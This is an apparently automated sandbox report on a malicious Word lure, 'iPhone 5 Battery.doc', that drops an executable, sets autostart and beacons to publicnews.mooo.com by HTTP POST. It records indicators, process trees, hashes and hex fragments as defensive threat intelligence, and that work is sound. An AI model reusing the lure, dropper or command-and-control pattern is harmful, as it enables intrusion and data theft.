General Information

Start time: 14:33:56
Start date: 16/08/2012
Overall analysis duration: 0h 3m 18s
Sample file name: iPhone 5 Battery.doc
Cookbook file name: officeall.jbs
Analysis system description: XP SP3, Office 2003 SP3
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Errors:
  • Too many NtProtectVirtualMemory calls (excessive behavior)
  • Too many NtAllocateVirtualMemory calls (excessive behavior)
  • Too many NtUserMessageCall calls (excessive behavior)
  • Too many NtSetInformationFile calls (excessive behavior)
  • Too many NtWriteFile calls (excessive behavior)

Classification / Threat Score

Persistence, Installation, Boot Survival :
Hiding, Stealthiness, Detection and Removal Protection :
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection :
Spreading :
Exploiting :
Networking :
Data spying, Sniffing, Keylogging, Ebanking Fraud :

Matching Signatures

Binary contains paths to debug symbols
Creates files inside the user directory
Creates temporary files
Downloads files
Printf formatting strings found in memory and binary data
Reads ini files
Runs a DLL by calling functions
Spawns processes
Urls found in memory or binary data
Creates an autostart registry key
Creates mutexes:
  • \BaseNamedObjects\Local\Mutex_MSOSharedMem
  • \BaseNamedObjects\DirectSound DllMain mutex (0x00000488)
  • \BaseNamedObjects\Local\Mso97SharedDg20321108172Mutex
  • \BaseNamedObjects\oleacc-msaa-loaded
  • \BaseNamedObjects\DDrawWindowListMutex
  • \BaseNamedObjects\__DDrawExclMode__
  • \BaseNamedObjects\StiTraceMutexSti_Trace.log
  • \BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-507921405-1960408961-839522115-500
  • \BaseNamedObjects\Local\Mso97SharedDg19521108172Mutex
  • \BaseNamedObjects\Local\Mso97SharedDg19211108172Mutex
  • \BaseNamedObjects\Global\WiaDebugFileMut
  • \BaseNamedObjects\Local\Mso97SharedDg19531108172Mutex
  • \BaseNamedObjects\OfficeAssistantStateMutex
  • \BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-507921405-1960408961-839522115-500
  • \BaseNamedObjects\__DDrawCheckExclMode__
Downloads files from webservers via HTTP
Drops PE files
Found strings which match known social media URLs
May have tried to detect a virtual machine to identify the environment (VM Detection)
Performs DNS lookups
Posts data to webserver
Allocates a big amount of memory (probably used for heap spraying)
Creates and opens a fake document (probably a fake document to hide exploiting)
Document exploit detected (drops PE files)
Document exploit detected (performs DNS queries)
Document exploit detected (performs HTTP gets)
Document exploit detected (process start blacklist hit)
Infects executable files (exe, dll, sys, html): C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Startup

  • system is office2003sp3
  • WINWORD.EXE (PID: 1160 MD5: 443747857245BF90847AE396C53470A6)
    • ~WORDL.tmp (PID: 1112 MD5: 99C47CE55EF67DAEE72E82608E4F62DD)
      • rundll32.exe (PID: 760 MD5: 037B1E7798960E0420003D05BB577EE6)
      • cmd.exe (PID: 868 MD5: 6D778E0F95447E6546553EEEA709D03C)
    • cmd.exe (PID: 1096 MD5: 6D778E0F95447E6546553EEEA709D03C)
      • WINWORD.EXE (PID: 900 MD5: 443747857245BF90847AE396C53470A6)
  • svchost.exe (PID: 1832 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
  • cleanup

Created / dropped Files

File Path MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Word8.0\ShockwaveFlashObjects.exd A4DE5E2A16D82D803735967C783CA368
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~WRD0002.doc 3B8EE5F6275A30671021B1594506A58D
C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc 13847C659F831C6AEA3C480597E424C8
C:\DOCUME~1\ADMINI~1\LOCALS~1\~$hone 5.doc 9B2BEAB1F4B66A3331B6C566C7E6DDFA
C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp 99C47CE55EF67DAEE72E82608E4F62DD
C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\Recent\Local Settings.LNK 1C17F458C1BD5844CBC9E71F84AD77B9
C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\Recent\iPhone 5.doc.LNK 34ECC7FCCE484F8B7042FA98735EC494
C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\Recent\index.dat B030A356C4F75056E6F7FAD09309FE2E
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC FFE89BDDF49F24398D21523137827222
C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot A0F4BD67F4388E1BC61D5DBB85D5650F
C:\Documents and Settings\Administrator\Application Data\taskman.dll FE7E03F7F62F2D65C5B8E233300A373C
C:\Documents and Settings\Administrator\Desktop\~$hone 5 Battery.doc 411239DF57C33F1405AF3453F7EC9A35
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.MSO\3430B573.wmf B26FB08CB1A991E87742C0C5DFD5CAE7
C:\WINDOWS\wiadebug.log 2C04268C23022887648C318054663351
C:\WINDOWS\wiaservc.log 5F8BD4D1DCDF5F8FC86B68BE433B6245
\ROUTER 6685DD0933ADE478A22AE7864388C7F7
\net\NtControlPipe11 67118A81A9461CA93D1DCBD673828CFE
\srvsvc 00010789CF97BAA5F49E8C7BF0605D58

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP info

Static File Info

File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1252, Title: , Author: Mark, Template: Normal, Last Saved By: Mark, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Aug 9 12:38:00 2012, Last Saved Time/Date: Thu Aug 9 12:38:00 2012, Number of Pages: 1, Number of Words: 7, Number of Characters: 41, Security: 0
File name: iPhone 5 Battery.doc
File size: 298496
MD5: 7e3770351aed43fd6c5cab8e06dc0300
SHA1: b4562ef0cd54234374ff9d24e0d1b01c1db5e873
SHA256: 742db588c3cfa416215619db34e168be58846058f7528adee8358bb8b8b68fe3
SHA512: 3c1c1189eb94725517024761d4a31ba351611ad432ea0dcce89e4961c28c7233363f6feb431602308ff704396781df62147907e382a14b1754d7b9e31ca2fac6

String Analysis

Debug symbol paths
Formattings for printf style functions
URLs
http://search.livedoor.com/ WINWORD.EXE
http://search.livedoor.com/favicon.ico WINWORD.EXE
http://search.lycos.co.uk/ WINWORD.EXE
http://search.lycos.com/ WINWORD.EXE
http://search.lycos.com/favicon.ico WINWORD.EXE
http://search.microsoft.com/ WINWORD.EXE
http://search.msn.co.jp/results.aspx?q= WINWORD.EXE
http://search.msn.co.uk/results.aspx?q= WINWORD.EXE
http://search.msn.com.cn/results.aspx?q= WINWORD.EXE
http://search.msn.com/results.aspx?q= WINWORD.EXE
http://search.nate.com/ WINWORD.EXE
http://search.naver.com/ WINWORD.EXE
http://search.naver.com/favicon.ico WINWORD.EXE
http://search.nifty.com/ WINWORD.EXE
http://search.orange.co.uk/ WINWORD.EXE
http://search.orange.co.uk/favicon.ico WINWORD.EXE
http://search.rediff.com/ WINWORD.EXE
http://search.rediff.com/favicon.ico WINWORD.EXE
http://search.seznam.cz/ WINWORD.EXE
http://search.seznam.cz/favicon.ico WINWORD.EXE
http://search.sify.com/ WINWORD.EXE
http://search.yahoo.co.jp WINWORD.EXE
http://search.yahoo.co.jp/favicon.ico WINWORD.EXE
http://search.yahoo.com/ WINWORD.EXE
http://search.yahoo.com/favicon.ico WINWORD.EXE
http://search.yam.com/ WINWORD.EXE
http://search1.taobao.com/ WINWORD.EXE
http://search2.estadao.com.br/ WINWORD.EXE
http://searchresults.news.com.au/ WINWORD.EXE
http://service2.bfast.com/ WINWORD.EXE
http://si.wikipedia.org/ WINWORD.EXE
http://si.wikipedia.org/favicon.ico WINWORD.EXE
http://si.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://sitesearch.timesonline.co.uk/ WINWORD.EXE
http://so-net.search.goo.ne.jp/ WINWORD.EXE
http://spaces.live.com/ WINWORD.EXE
http://spaces.live.com/blogit.aspx WINWORD.EXE
http://suche.aol.de/ WINWORD.EXE
http://suche.freenet.de/ WINWORD.EXE
http://suche.freenet.de/favicon.ico WINWORD.EXE
http://suche.lycos.de/ WINWORD.EXE
http://suche.t-online.de/ WINWORD.EXE
http://suche.web.de/ WINWORD.EXE
http://suche.web.de/favicon.ico WINWORD.EXE
http://support.microsoft.com WINWORD.EXE
http://techcrunch.com/2012/06/06/size-matters-supply-chain-whispers-hint-at-4-08-169-display-on-iphone-5/ iPhone 5.doc.dr
http://techcrunch.com/2012/06/11/apple-announces-ios-6-wwdc/ iPhone 5.doc.dr
http://techcrunch.com/2012/06/20/confirmed-the-new-iphone-will-have-a-19-pin-mini-conne WINWORD.EXE
http://techcrunch.com/2012/06/20/confirmed-the-new-iphone-will-have-a-19-pin-mini-connector/ iPhone 5.doc.dr
http://translator.live.com/?ref=ie8activity WINWORD.EXE
http://translator.live.com/bv.aspx?ref=ie8activity&amp;a= WINWORD.EXE
http://translator.live.com/bvprev.aspx?ref=ie8activity WINWORD.EXE
http://translator.live.com/default.aspx?ref=ie8activity WINWORD.EXE
http://translator.live.com/defaultprev.aspx?ref=ie8activity WINWORD.EXE
http://treyresearch.net WINWORD.EXE
http://tw.search.yahoo.com/ WINWORD.EXE
http://udn.com/ WINWORD.EXE
http://udn.com/favicon.ico WINWORD.EXE
http://uk.ask.com/ WINWORD.EXE
http://uk.ask.com/favicon.ico WINWORD.EXE
http://uk.search.yahoo.com/ WINWORD.EXE
http://vachercher.lycos.fr/ WINWORD.EXE
http://video.globo.com/ WINWORD.EXE
http://video.globo.com/favicon.ico WINWORD.EXE
http://web.ask.com/ WINWORD.EXE
http://wellformedweb.org/commentapi/ WINWORD.EXE
http://windowsupdate.microsoft.com WINWORD.EXE
http://www.abril.com.br/ WINWORD.EXE
http://www.abril.com.br/favicon.ico WINWORD.EXE
http://www.adobe.com/2006/flex/mx/internal iPhone 5 Battery.doc
http://www.adobe.com/products/flex WINWORD.EXE, iPhone 5 Battery.doc
http://www.afisha.ru/app_themes/default/images/favicon.ico WINWORD.EXE
http://www.alarabiya.net/ WINWORD.EXE
http://www.alarabiya.net/favicon.ico WINWORD.EXE
http://www.amazon.co.jp/ WINWORD.EXE
http://www.amazon.co.uk/ WINWORD.EXE
http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword= WINWORD.EXE
http://www.amazon.com/favicon.ico WINWORD.EXE
http://www.amazon.com/gp/search?ie=utf8&amp;tag=ie8search-20&amp;index=blended&amp;linkcode=qs&amp;camp=1789&amp;creative=9325&amp;keywords= WINWORD.EXE
http://www.amazon.de/ WINWORD.EXE
http://www.aol.com/favicon.ico WINWORD.EXE
http://www.arrakis.com/ WINWORD.EXE
http://www.arrakis.com/favicon.ico WINWORD.EXE
http://www.asharqalawsat.com/ WINWORD.EXE
http://www.asharqalawsat.com/favicon.ico WINWORD.EXE
http://www.ask.com/ WINWORD.EXE
http://www.auction.co.kr/auction.ico WINWORD.EXE
http://www.baidu.com/ WINWORD.EXE
http://www.baidu.com/favicon.ico WINWORD.EXE
http://www.bing.com/az/hprichbg?p=rb%2fmelonskin_en-us1533494814-d.jpg rundll32.exe
http://www.bing.com/fav rundll32.exe
http://www.bing.com/favicon.ico rundll32.exe
http://www.bing.com/fd/fb/r?v=8_07_0_1457099&sid=0 rundll32.exe
http://www.bing.com/fd/s/a/sw13.png rundll32.exe
http://www.bing.com/msnhomepagehistory.aspx?sid=549dec4b28164f7b802ae451620e3592&_=1343168347250 rundll32.exe
http://www.bing.com/partner/primedns.gif rundll32.exe
http://www.bing.com/s/as/1436447/en.js rundll32.exe
http://www.bing.com/sa/8_01_0_1462371/bubble_black.js rundll32.exe
http://www.bing.com/search?q=edmullen rundll32.exe
http://www.cdiscount.com/ WINWORD.EXE
http://www.cdiscount.com/favicon.ico WINWORD.EXE
http://www.ceneo.pl/ WINWORD.EXE
http://www.ceneo.pl/favicon.ico WINWORD.EXE
http://www.chennaionline.com/ncommon/images/collogo.ico WINWORD.EXE
http://www.cjmall.com/ WINWORD.EXE
http://www.cjmall.com/favicon.ico WINWORD.EXE
http://www.clarin.com/favicon.ico WINWORD.EXE
http://www.cnet.co.uk/ WINWORD.EXE
http://www.cnet.com/favicon.ico WINWORD.EXE
http://www.dailymail.co.uk/ WINWORD.EXE
http://www.dailymail.co.uk/favicon.ico WINWORD.EXE
http://www.etmall.com.tw/ WINWORD.EXE
http://www.etmall.com.tw/favicon.ico WINWORD.EXE
http://www.excite.co.jp/ WINWORD.EXE
http://www.expedia.com/ WINWORD.EXE
http://www.expedia.com/favicon.ico WINWORD.EXE
http://www.facebook.com/ WINWORD.EXE
http://www.facebook.com/favicon.ico WINWORD.EXE
http://www.gismeteo.ru/favicon.ico WINWORD.EXE
http://www.gmarket.co.kr/ WINWORD.EXE
http://www.gmarket.co.kr/favicon.ico WINWORD.EXE
http://www.google.co.in/ WINWORD.EXE
http://www.google.co.jp/ WINWORD.EXE
http://www.google.co.uk/ WINWORD.EXE
http://www.google.com.br/ WINWORD.EXE
http://www.google.com.sa/ WINWORD.EXE
http://www.google.com.tw/ WINWORD.EXE
http://www.google.com/ WINWORD.EXE
http://www.google.com/favicon.ico WINWORD.EXE
http://www.google.cz/ WINWORD.EXE
http://www.google.de/ WINWORD.EXE
http://www.google.es/ WINWORD.EXE
http://www.google.fr/ WINWORD.EXE
http://www.google.it/ WINWORD.EXE
http://www.google.pl/ WINWORD.EXE
http://www.google.ru/ WINWORD.EXE
http://www.google.si/ WINWORD.EXE
http://www.iask.com/ WINWORD.EXE
http://www.iask.com/favicon.ico WINWORD.EXE
http://www.kkbox.com.tw/ WINWORD.EXE
http://www.kkbox.com.tw/favicon.ico WINWORD.EXE
http://www.linternaute.com/favicon.ico WINWORD.EXE
http://www.live.com/favicon.ico WINWORD.EXE
http://www.macromedia.com WINWORD.EXE
http://www.maktoob.com/favicon.ico WINWORD.EXE
http://www.mercadolibre.com.mx/ WINWORD.EXE
http://www.mercadolibre.com.mx/favicon.ico WINWORD.EXE
http://www.mercadolivre.com.br/ WINWORD.EXE
http://www.mercadolivre.com.br/favicon.ico WINWORD.EXE
http://www.merlin.com.pl/ WINWORD.EXE
http://www.merlin.com.pl/favicon.ico WINWORD.EXE
http://www.microsoft.com/favicon.ico WINWORD.EXE
http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome rundll32.exe
http://www.microsoft.com/schemas/rss/core/2005/internal WINWORD.EXE
http://www.microsoft.com/windowsxp/expertzone/ WINWORD.EXE
http://www.msn.com rundll32.exe
http://www.mtv.com/ WINWORD.EXE
http://www.mtv.com/favicon.ico WINWORD.EXE
http://www.myspace.com/favicon.ico WINWORD.EXE
http://www.najdi.si/ WINWORD.EXE
http://www.najdi.si/favicon.ico WINWORD.EXE
http://www.nate.com/favicon.ico WINWORD.EXE
http://www.neckermann.de/ WINWORD.EXE
http://www.neckermann.de/favicon.ico WINWORD.EXE
http://www.news.com.au/favicon.ico WINWORD.EXE
http://www.nifty.com/favicon.ico WINWORD.EXE
http://www.ocn.ne.jp/favicon.ico WINWORD.EXE
http://www.orange.fr/ WINWORD.EXE
http://www.otto.de/favicon.ico WINWORD.EXE
http://www.ozon.ru/ WINWORD.EXE
http://www.ozon.ru/favicon.ico WINWORD.EXE
http://www.ozu.es/favicon.ico WINWORD.EXE
http://www.paginasamarillas.es/ WINWORD.EXE
http://www.paginasamarillas.es/favicon.ico WINWORD.EXE
http://www.pchome.com.tw/favicon.ico WINWORD.EXE
http://www.priceminister.com/ WINWORD.EXE
http://www.priceminister.com/favicon.ico WINWORD.EXE
http://www.rakuten.co.jp/favicon.ico WINWORD.EXE
http://www.rambler.ru/ WINWORD.EXE
http://www.rambler.ru/favicon.ico WINWORD.EXE
http://www.recherche.aol.fr/ WINWORD.EXE
http://www.rtl.de/ WINWORD.EXE
http://www.rtl.de/favicon.ico WINWORD.EXE
http://www.servicios.clarin.com/ WINWORD.EXE
http://www.shopzilla.com/ WINWORD.EXE
http://www.sify.com/favicon.ico WINWORD.EXE
http://www.so-net.ne.jp/share/favicon.ico WINWORD.EXE
http://www.sogou.com/ WINWORD.EXE
http://www.sogou.com/favicon.ico WINWORD.EXE
http://www.soso.com/ WINWORD.EXE
http://www.soso.com/favicon.ico WINWORD.EXE
http://www.t-online.de/favicon.ico WINWORD.EXE
http://www.taobao.com/ WINWORD.EXE
http://www.taobao.com/favicon.ico WINWORD.EXE
http://www.target.com/ WINWORD.EXE
http://www.target.com/favicon.ico WINWORD.EXE
http://www.tchibo.de/ WINWORD.EXE
http://www.tchibo.de/favicon.ico WINWORD.EXE
http://www.tesco.com/ WINWORD.EXE
http://www.tesco.com/favicon.ico WINWORD.EXE
http://www.timesonline.co.uk/img/favicon.ico WINWORD.EXE
http://www.tiscali.it/favicon.ico WINWORD.EXE
http://www.typodermic.com iPhone 5 Battery.doc
http://www.univision.com/ WINWORD.EXE
http://www.univision.com/favicon.ico WINWORD.EXE
http://www.w3.org/1999/02/22-rdf-syntax-ns# WINWORD.EXE, iPhone 5 Battery.doc
http://www.w3.org/1999/xhtml WINWORD.EXE
http://www.w3.org/1999/xsl/transform WINWORD.EXE
http://www.w3.org/2001/xmlschema 6C3CF.dmp.dr
http://www.w3.org/2001/xmlschema-instance 6C3CF.dmp.dr
http://www.w3.org/tr/html4/loose.dtd WINWORD.EXE
http://www.w3.org/tr/html4/strict.dtd WINWORD.EXE
http://www.w3.org/tr/html401/strict.dtd WINWORD.EXE
http://www.w3.org/tr/rec-html40/strict.dtd WINWORD.EXE
http://www.w3.org/tr/wd-xsl WINWORD.EXE
http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd WINWORD.EXE
http://www.walmart.com/ WINWORD.EXE
http://www.walmart.com/favicon.ico WINWORD.EXE
http://www.weather.com/ WINWORD.EXE
http://www.weather.com/favicon.ico WINWORD.EXE
http://www.ya.com/favicon.ico WINWORD.EXE
http://www.yam.com/favicon.ico WINWORD.EXE
http://www.yandex.ru/ WINWORD.EXE
http://www.yandex.ru/favicon.ico WINWORD.EXE
http://www3.fnac.com/ WINWORD.EXE
http://www3.fnac.com/favicon.ico WINWORD.EXE
http://xml-us.amznxslt.com/onca/xml?service=awsecommerceservice&amp;version=2008-06-26&amp;operation=itemsearch&amp;awsaccesskeyid=15hrv3azsmpk0gxty102&amp;associatetag=ie8suggestion-20&amp;responsegroup=itemattributes WINWORD.EXE
http://yellowpages.superpages.com/ WINWORD.EXE
http://z.about.com/m/a08.ico WINWORD.EXE
https://example.com WINWORD.EXE
https://ieonlinews.microsoft.com/ WINWORD.EXE
https://office.bcentral.com/eservices/index?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE, 6C3CF.dmp.dr
https://office.bcentral.com/eservices/service?command=webpost&dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE, 6C3CF.dmp.dr
Social media names
String value Source
<SuggestionsURL>http://ie.search.yahoo.com/os?command={SearchTerms}</SuggestionsURL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<FavoriteIcon>http://search.yahoo.co.jp/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo) WINWORD.EXE
<FavoriteIcon>http://search.yahoo.com/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo) WINWORD.EXE
<FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook) WINWORD.EXE
<FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace) WINWORD.EXE
<FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler) WINWORD.EXE
<URL>http://br.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://de.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://es.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://espanol.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://fr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://in.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://it.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://kr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://ru.search.yahoo.com</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://sads.myspace.com/</URL> equals www.myspace.com (Myspace) WINWORD.EXE
<URL>http://search.cn.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://search.yahoo.co.jp</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://tw.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://uk.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook) WINWORD.EXE
<URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler) WINWORD.EXE
Free Hotmail.url equals www.hotmail.com (Hotmail) WINWORD.EXE
VM Artifacts
String value Source
ROOT\LEGACY_VBOXSF\0000 svchost.exe
SCSI\DISK&VEN_VMWARE_&PROD_VMWARE_VIRTUAL_S&REV_1 svchost.exe
ROOT\LEGACY_VMHGFS\0000 svchost.exe
ROOT\LEGACY_VMWAREAUTH\0000 svchost.exe
IDE\CDROMNECVMWAR_VMWARE_IDE_CDR10_______________1.00____\3031303030303030303030303030303030303130 svchost.exe
SCSI\DISK&VEN_VMWARE_&PROD_VMWARE_VIRTUAL_S&REV_1.0\4&5FCAAFC&1&000 svchost.exe

Network Behavior

TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Aug 16, 2012 14:35:29.080504894 CEST 1099 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:29.080528021 CEST 80 1099 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:29.080727100 CEST 1099 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:29.087272882 CEST 1099 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:29.087289095 CEST 80 1099 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:47.000443935 CEST 80 1099 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:47.000756025 CEST 1099 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:47.001743078 CEST 1099 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:47.001756907 CEST 80 1099 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:47.008352995 CEST 1100 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:47.008384943 CEST 80 1100 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:47.008574963 CEST 1100 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:47.010173082 CEST 1100 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:47.010190964 CEST 80 1100 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:55.003201008 CEST 80 1100 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:55.003520966 CEST 1100 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:55.004192114 CEST 1100 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:55.004208088 CEST 80 1100 108.171.240.86 192.168.0.11
UDP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Aug 16, 2012 14:35:29.035233974 CEST 55604 53 192.168.0.11 195.186.1.121
Aug 16, 2012 14:35:29.035330057 CEST 53 55604 195.186.1.121 192.168.0.11
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Aug 16, 2012 14:35:29.035233974 CEST 192.168.0.11 195.186.1.121 0x55cb Standard query (0) publicnews.mooo.com A (IP address) IN (0x0001)
DNS Answers
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Aug 16, 2012 14:35:29.035330057 CEST 195.186.1.121 192.168.0.11 0x55cb No error (0) publicnews.mooo.com 108.171.240.86 A (IP address) IN (0x0001)
HTTP Request Dependency Graph
  • publicnews.mooo.com
HTTP Packets
Timestamp Source Port Dest Port Source IP Dest IP Header Total Bytes Transferred (KB)
Aug 16, 2012 14:35:29.087272882 CEST 1099 80 192.168.0.11 108.171.240.86 POST /news.php?1221 HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: publicnews.mooo.com
Content-Length: 89
Cache-Control: no-cache
0
Aug 16, 2012 14:35:47.010173082 CEST 1100 80 192.168.0.11 108.171.240.86 GET /logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: publicnews.mooo.com
Cache-Control: no-cache
Cookie: mid=14D7C316078BFBFF00600F12
1

Code Manipulation Behavior

System Behavior

General
Start time: 15:20:04
Start date: 24/07/2012
Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x30000000
File size: 12310368 bytes
MD5 hash: 443747857245BF90847AE396C53470A6

File Activities

File Path Access Options Content overwritten Completion Count Source Address Symbol
File Path Access Attributes Options Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.Word read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident success or wait 1 3017FDAF CreateDirectoryW
C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp read attributes and synchronize and generic write normal synchronous io non alert and non directory file success or wait 1 C0D0229 CreateFileA
C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc read attributes and synchronize and generic write normal synchronous io non alert and non directory file success or wait 1 C0D029F CreateFileA
File Path Offset Length Value Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot unknown 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 30041F40 WriteFile
C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot unknown 108 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 48 00 00 00 00 00 3E 00 02 02 00 00 06 00 09 00 34 00 00 00 00 00 90 00 90 00 00 00 00 00 0F 00 00 00 FF FF FF 00 00 00 00 00 00 00 14 00 14 00 00 00 00 00 00 00 02 63 78 00 C8 00 00 00 00 00 14 00 00 00 00 00 90 00 90 00 80 00 16 00 00 00 success or wait 1 30041F40 WriteFile
C:\Documents and Settings\Administrator\Desktop\~$hone 5 Battery.doc unknown 54 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 30041F40 WriteFile
C:\Documents and Settings\Administrator\Desktop\~$hone 5 Battery.doc unknown 108 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 1E 00 00 00 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 16 00 00 00 40 00 08 00 36 01 05 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1A 00 00 00 success or wait 1 30041F40 WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~WRD0002.doc unknown 581 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF success or wait 1 3019476C WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp unknown 90112 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 C0D0488 WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc unknown 21504 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3E 00 03 00 FE FF 09 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 25 00 00 00 00 00 00 00 00 10 00 00 27 00 00 00 01 00 00 00 FE FF FF FF 00 00 00 00 24 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF success or wait 1 C0D0334 WriteFile
File Path Offset Length Value Completion Count Source Address Symbol
